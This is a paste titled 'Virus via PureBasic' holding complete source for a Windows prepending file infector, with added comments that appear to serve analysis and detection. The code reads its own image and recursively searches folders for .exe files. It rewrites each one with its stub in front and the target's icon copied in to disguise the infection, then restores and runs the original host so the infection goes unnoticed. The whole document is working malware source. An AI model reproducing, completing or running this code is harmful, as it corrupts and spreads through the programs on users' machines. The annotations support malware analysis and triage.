
Virus via PureBasic

a guest Nov 13th, 2018 338 Never
  1. EnableExplicit
  2.  
     ; Analysis notes: module-level state and forward declarations for the
     ; procedures below. The listing implements a prepending file infector:
     ; Infect() rewrites a target as [VirSize-byte stub][original file bytes].
     ; TmpPath$ is filled from GetTempPath_ in Start().
  3. Global TmpPath$
     ; VirSize: byte count treated as the stub at the front of an infected file
     ; (copy length in Infect, split point between stub and host in Start).
  4. Global VirSize=18944
     ; icOffset: offset inside the stub copy where Infect writes the icon data
     ; taken from the target file.
  5. Global icOffset=14496
  6. Declare isDriveReady(Path$)
  7. Declare GetIcon(FileName.s, *P)
  8. Declare FindFiles(Path$,*P, hndl)
  9. Declare Infect(Path$, *P)
  10. Declare DoSearch(*P, handle)
  11. Declare Start()
  12. Declare.s RndName()
  13.  
  14. Procedure isDriveReady(Path$)
      ; Returns the result of GetVolumeInformation_ for Path$ (a trailing "\" is
      ; appended when missing). All output parameters are passed as 0, so only
      ; the success/failure value is used. Not called anywhere in this listing.
  15.   If Right(Path$,1) <> "\":Path$+"\":EndIf
  16.   ProcedureReturn GetVolumeInformation_(@Path$,0,0,0,0,0,0,0)
  17. EndProcedure
  18.  
  19. Procedure GetIcon(FileName.s, *P)
      ; Reads the first icon of FileName and serialises it into the caller's
      ; buffer *P as: BITMAPINFOHEADER fields, an optional colour table, the
      ; colour bitmap bits, then the 1-bpp mask bits.
      ; Returns 0 when GetIconInfo_ fails, 1 otherwise.
      ; Relevance for triage: this is what makes an infected file keep showing
      ; the icon of the original program (see the icOffset copy in Infect).
  20.   Protected iconinfo.ICONINFO, hbmMask, hbmColor
  21.   Protected cbitmap.BITMAP, cwidth, cheight, cbitsperpixel, colorcount, colorplanes
  22.   Protected mbitmap.BITMAP, mwidth, mheight, fIcon, xHotspot, yHotspot, ch
  23.   Protected imagebytecount, hdc, oldbitmap, mem, bytesinrow, temp
  24.   Protected *bitmapinfo.BITMAPINFO
  25.   Protected *PP,hIcon
  26.   *PP=*P ; *PP is the running write cursor into the caller's buffer
  27.   hIcon=0
        ; Requests one large icon at index 0 of the file.
  28.   ExtractIconEx_(@FileName,0,@hIcon,0,1)
  29.   If Not(GetIconInfo_(hIcon, iconinfo)) : ProcedureReturn 0 : EndIf
  30.   fIcon=2-iconinfo\fIcon ; value is not read again in this procedure
        ; Scratch BITMAPINFO with room for 256 RGBQUAD entries (SizeOf(RGBQUAD)<<8).
  31.   *bitmapinfo = GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,SizeOf(BITMAPINFO) + SizeOf(RGBQUAD)<<8)
  32.   hbmMask=iconinfo\hbmMask
  33.   GetObject_(hbmMask, SizeOf(BITMAP),mbitmap)
  34.   mwidth= mbitmap\bmWidth
  35.   mheight= mbitmap\bmHeight
  36.   hbmColor=iconinfo\hbmColor
        ; Colour icon: take the geometry from the colour bitmap.
  37.   If hbmColor
  38.     GetObject_(hbmColor, SizeOf(BITMAP),cbitmap)
  39.     cwidth= cbitmap\bmWidth
  40.     cheight= cbitmap\bmHeight
  41.     cbitsperpixel = cbitmap\bmBitsPixel
  42.     If cbitsperpixel = 0 : cbitsperpixel = 1 : EndIf
  43.     If cbitsperpixel < 8
  44.       colorcount=Pow(2,cbitsperpixel)
  45.     EndIf
  46.     colorplanes=cbitmap\bmplanes
        ; No colour bitmap: the mask bitmap is treated as holding both halves,
        ; so the height is split in two and the icon is handled as 1 bpp.
  47.   Else
  48.     cwidth= mwidth
  49.     cheight= mheight/2
  50.     cbitsperpixel = 1
  51.     colorcount=2
  52.     colorplanes=1
  53.     mheight=cheight
  54.   EndIf
        ; Header fields written in order: size (4), width (4), height (4),
        ; planes (2), bit count (2). Height is colour height + mask height.
  55.   imagebytecount=SizeOf(BITMAPINFOHEADER)
  56.   RtlMoveMemory_(*PP,@imagebytecount,4)
  57.   *PP+4
  58.   RtlMoveMemory_(*PP,@cwidth,4)
  59.   *PP+4
  60.   ch=cheight+mheight
  61.   RtlMoveMemory_(*PP,@ch,4)
  62.   *PP+4
  63.   RtlMoveMemory_(*PP,@colorplanes,2)
  64.   *PP+2
  65.   RtlMoveMemory_(*PP,@cbitsperpixel,2)
        ; 4+4+4+2 = 14 bytes advanced so far; +26 puts the cursor at offset 40,
        ; leaving the remaining header bytes as the caller's buffer had them.
  66.   *PP+26
  67.   hdc=CreateCompatibleDC_(0)
        ; Colour table: two 4-byte entries for the mask-only case (the calls pass
        ; #Black and #White as the source argument), or the DIB colour table of
        ; the colour bitmap when it has 8 bits per pixel or fewer.
  68.   If hbmColor = 0
  69.     RtlMoveMemory_(*PP,#Black,4)
  70.     *PP+4
  71.     RtlMoveMemory_(*PP,#White,4)
  72.     *PP+4
  73.     imagebytecount+SizeOf(rgbquad)*2
  74.   ElseIf cbitsperpixel<=8
  75.     temp=Pow(2,cbitsperpixel)
  76.     bytesinrow = SizeOf(rgbquad)*temp
  77.     mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,bytesinrow)
  78.     oldbitmap=SelectObject_(hdc, hbmColor)
  79.     GetDIBColorTable_(hdc, 0, temp, mem)    
  80.     RtlMoveMemory_(*PP, mem, bytesinrow)
  81.     *PP+bytesinrow
  82.     GlobalFree_(mem)
  83.     SelectObject_(hdc, oldbitmap)
  84.     imagebytecount+bytesinrow
  85.   EndIf
        ; Colour bits: row stride rounded up to a multiple of 4 bytes, times the
        ; colour height; bytesinrow holds the whole image size after line 87.
  86.   bytesinrow = (cwidth*cbitsperpixel+31)/32*4
  87.   bytesinrow * cheight
  88.   mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,bytesinrow)
  89.   *bitmapinfo\bmiHeader\biSize=SizeOf(BITMAPINFOHEADER)
  90.   *bitmapinfo\bmiHeader\biWidth=cwidth
  91.   *bitmapinfo\bmiHeader\biPlanes=colorplanes
  92.   *bitmapinfo\bmiHeader\biBitCount=cbitsperpixel
  93.   If hbmColor
  94.     *bitmapinfo\bmiHeader\biHeight=cheight
  95.     GetDIBits_(hdc,hbmColor,0,cheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
  96.   Else
  97.     *bitmapinfo\bmiHeader\biHeight=2*cheight
  98.     GetDIBits_(hdc,hbmMask,0,cheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
  99.   EndIf
  100.   RtlMoveMemory_(*PP, mem, bytesinrow)
  101.   *PP+bytesinrow
  102.   GlobalFree_(mem)
  103.   imagebytecount+bytesinrow
         ; Mask bits: same stride calculation at 1 bit per pixel.
  104.   bytesinrow = (mwidth+31)/32*4
  105.   bytesinrow * mheight
  106.   mem=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT, bytesinrow)
  107.   *bitmapinfo\bmiHeader\biWidth=mwidth
  108.   *bitmapinfo\bmiHeader\biPlanes=1
  109.   *bitmapinfo\bmiHeader\biBitCount=1
  110.   If hbmColor
  111.     *bitmapinfo\bmiHeader\biHeight=mheight
  112.     GetDIBits_(hdc,hbmMask,0,mheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
  113.   Else
  114.     *bitmapinfo\bmiHeader\biHeight=2*mheight
  115.     GetDIBits_(hdc,hbmMask,mheight,mheight,mem,*bitmapinfo,#DIB_RGB_COLORS)
  116.   EndIf
  117.   RtlMoveMemory_(*PP,mem, bytesinrow)
         ; Release the scratch buffer, the DC and the two bitmaps from ICONINFO.
  118.   GlobalFree_(mem)
  119.   DeleteDC_(hdc)
  120.   DeleteObject_(hbmMask)
  121.   DeleteObject_(hbmColor)
  122.   GlobalFree_(*bitmapinfo)
  123.   ProcedureReturn 1
  124. EndProcedure
  125.  
  126. Procedure FindFiles(Path$, *P,hndl)
       ; Recursively walks Path$ and calls Infect() on every entry whose last
       ; three characters are "exe" (case-insensitive). *P is passed through
       ; unchanged. hndl is an optional stop signal: see line 132.
       ; Telemetry view: a FindFirstFile/FindNextFile sweep of a directory tree
       ; followed by read/write opens of each .exe it finds.
  127.   Define hFind.i,WD.WIN32_FIND_DATA,fPath$, fName$,fExt$
  128.   If Right(Path$,1) <> "\":Path$=Path$+"\":EndIf
  129.   hFind=FindFirstFile_(Path$+"*.*",WD)
  130.   If hFind <> #INVALID_HANDLE_VALUE
  131.     Repeat
           ; With a real handle, a zero-timeout wait that returns anything other
           ; than #WAIT_TIMEOUT ends the walk of this directory. Start() passes
           ; the process handle of the relaunched program here.
  132.       If hndl <> #INVALID_HANDLE_VALUE And WaitForSingleObject_(hndl,0) <> #WAIT_TIMEOUT:Break:EndIf
  133.       fName$=PeekS(@wd\cFileName[0])
  134.       If fName$ <> "." And fName$ <> ".."
  135.         fName$=Path$+fName$
  136.         If (WD\dwFileAttributes & #FILE_ATTRIBUTE_DIRECTORY)=#FILE_ATTRIBUTE_DIRECTORY
  137.           FindFiles(fName$, *P, hndl)
  138.         Else
  139.           fExt$=Right(fName$,3)
  140.           fExt$=LCase(fExt$)
  141.           If fExt$="exe"
  142.             Infect(fName$, *P)
  143.           EndIf
  144.         EndIf
  145.       EndIf
  146.     Until FindNextFile_(hFind, WD) <> #True
  147.     FindClose_(hFind)
  148.   EndIf
  149. EndProcedure
  150.  
  151. Procedure Infect(Path.s, *P)
       ; Rewrites the file at Path in place as
       ;   [VirSize bytes copied from *P][original file contents]
       ; with icon data from the target written into the stub copy at icOffset.
       ; Artefacts for detection and cleanup, as far as this procedure shows:
       ;   - the file grows by exactly VirSize (18944) bytes;
       ;   - the original program starts at file offset VirSize;
       ;   - the first VirSize bytes come from *P, apart from the 4264-byte
       ;     region at icOffset that is overwritten per target.
  152.   Define hFile.i,fSize.i,*nBuff, BR,*IC
         ; 4286-byte zero-filled buffer for the serialised icon; the result of
         ; GetIcon is not checked.
  153.   *IC=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,4286)
  154.   GetIcon(Path, *IC)
         ; Opens the existing target for read and write, sharing read only.
  155.   hFile=CreateFile_(@Path,#GENERIC_READ|#GENERIC_WRITE,#FILE_SHARE_READ,0,#OPEN_EXISTING,0,0)
  156.   If hFile=#INVALID_HANDLE_VALUE:Goto Close:EndIf
  157.   fSize=GetFileSize_(hFile,0)
         ; Size gate: jumps to Close only when both comparisons are true at once.
  158.   If fSize < 16000 And fSize > 5194368 :Goto Close :EndIf
  159.   BR=0
         ; New image buffer: stub first, original contents read in behind it.
  160.   *nBuff=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,fSize+VirSize)
  161.   RtlMoveMemory_(*nBuff, *P, VirSize)
  162.   RtlMoveMemory_(*nBuff+icoffset,*IC,  4264)
  163.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
  164.   ReadFile_(hFile,*nBuff+VirSize,fSize,@BR,0)
         ; Re-infection guard: CompareMemory is nonzero when the areas are equal,
         ; so a file whose first 200 bytes match the first 200 bytes of *P is
         ; left untouched.
  165.   If CompareMemory(*P, *nBuff+VirSize,200) <> 0:Goto Exit:EndIf
         ; Truncates the file to zero length and writes the combined buffer.
  166.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
  167.   SetEndOfFile_(hFile)
  168.   WriteFile_(hFile, *nBuff, fSize+VirSize, @BR,0)
  169.   SetEndOfFile_(hFile)
  170.   Exit:
  171.   GlobalFree_(*nBuff)
  172.   Close:
  173.   CloseHandle_(hFile)
  174.   GlobalFree_(*IC)
  175. EndProcedure
  176.  
  177. Procedure DoSearch(*P, handle)
       ; Starts the directory walk. In this listing only the fixed folder
       ; "C:\olo" is walked; the loop over drive roots Chr(67)..Chr(90)
       ; ("C:\" to "Z:\") below is commented out.
  178.  ; Define C$,I
  179.  ;  For I=67 To 90
  180.  ;  FindFiles(Chr(I)+":\", *P,handle)
  181.  ; Next
  182.   findfiles("C:\olo",*P, Handle)
  183. EndProcedure
  184.  
  185. Procedure.s RndName()
       ; Returns a four-character string. Each character code comes from
       ; Random(91) and is clamped to 65..90, so every character is an
       ; uppercase letter 'A'..'Z' and any draw below 65 becomes 'A'.
       ; Start() appends this name to the temp directory path, which gives a
       ; four-uppercase-letter, extension-less file name to look for in %TEMP%.
  186.   Define I,R,Result$
  187.   Result$=""
  188.   For I=1 To 4
  189.     R=Random(91)
  190.     If R < 65
  191.       R=65
  192.     ElseIf R> 90
  193.       R=90
  194.     EndIf
  195.     Result$+Chr(R)
  196.   Next
  197.   ProcedureReturn Result$
  198. EndProcedure
  199.  
  200. Procedure Start()
       ; Entry routine. Reads the running executable into memory, and when the
       ; file is larger than VirSize (i.e. it carries a host program behind the
       ; stub) restores and runs that host before searching for more files.
       ; Observable sequence in the fSize > VirSize branch:
       ;   1. the running .exe is moved into the temp directory under a
       ;      four-letter name from RndName();
       ;   2. a new file is created at the original path, holding the host
       ;      bytes first and the VirSize-byte stub after them;
       ;   3. that file is started with the current command line;
       ;   4. directory search runs while the child process is alive;
       ;   5. the file at the original path is deleted (retried every 100 ms)
       ;      and the temp copy is moved back.
  201.   Define hFile.i,fSize.i, BR.l, *FBuff,PI.PROCESS_INFORMATION,SI.STARTUPINFO, rName$,AppName$
         ; Suppresses critical-error dialogs for this process.
  202.   SetErrorMode_(#SEM_FAILCRITICALERRORS)
  203.   TmpPath$=Space(300)
  204.   RSet(TmpPath$,GetTempPath_(300, @TmpPath$))
  205.   AppName$=Space(300)
  206.   RSet(AppName$, GetModuleFileName_(0,@AppName$,300))
         ; Reads its own image file completely into *FBuff; the first VirSize
         ; bytes of that buffer are what Infect() later copies into targets.
  207.   hFile=CreateFile_(AppName$, #GENERIC_READ,#FILE_SHARE_READ,0,#OPEN_EXISTING,0,0)
  208.   If hFile=#INVALID_HANDLE_VALUE:End :EndIf
  209.   fSize=GetFileSize_(hFile,0)
  210.   *FBuff=GlobalAlloc_(#GMEM_FIXED|#GMEM_ZEROINIT,fSize)
  211.   SetFilePointer_(hFile,0,0,#FILE_BEGIN)
  212.   ReadFile_(hFile,*FBuff,fSize,@BR,0)
  213.   CloseHandle_(hFile)
  214.   If fSize > VirSize
  215.     rName$=rndName()
  216.     rName$=TmpPath$+rName$
  217.     MoveFile_(@AppName$, @rName$)
  218.     hFile=CreateFile_(@AppName$, #GENERIC_WRITE,#FILE_SHARE_READ,0,#CREATE_ALWAYS,0,0)
  219.     If hFile=#INVALID_HANDLE_VALUE:End :EndIf
           ; Host bytes (everything after the stub) go to offset 0 ...
  220.     SetFilePointer_(hFile,0,0,#FILE_BEGIN)
  221.     WriteFile_(hFile,*fBuff+VirSize,fSize-VirSize,@BR,0)
           ; ... and the stub is written after them, at offset fSize-VirSize.
  222.     SetFilePointer_(hFile,fSize-VirSize,0,#FILE_BEGIN)
  223.     WriteFile_(hFile,*fBuff,VirSize,@BR,0)
  224.     SetEndOfFile_(hFile)
  225.     CloseHandle_(hFile)
  226.     ZeroMemory_(@PI, SizeOf(PROCESS_INFORMATION))
  227.     ZeroMemory_(@SI, SizeOf(STARTUPINFO))
           ; Launches the recreated file with the command line of this process.
  228.     CreateProcess_(@AppName$, GetCommandLine_(),0,0,0,0,0,0,@SI,@PI)
           ; Search bounded by the child: FindFiles stops once the wait on
           ; PI\hProcess no longer returns #WAIT_TIMEOUT.
  229.     DoSearch(*fBuff, PI\hProcess)
           ; Retries until the file at the original path can be deleted, then
           ; moves the temp copy back to the original path.
  230.     Repeat
  231.       If DeleteFile_(@AppName$)
  232.         MoveFile_(@rName$, @AppName$)
  233.         Break
  234.       EndIf
  235.       Sleep_(100)
  236.     ForEver
  237.   EndIf
         ; Second search pass with no stop handle; runs in both branches.
  238.   DoSearch(*fBuff,#INVALID_HANDLE_VALUE)
  239.   GlobalFree_(*fBuff)
  240. EndProcedure
  241.  
  242.  
  243. Start() ; program entry point: the only top-level statement that runs code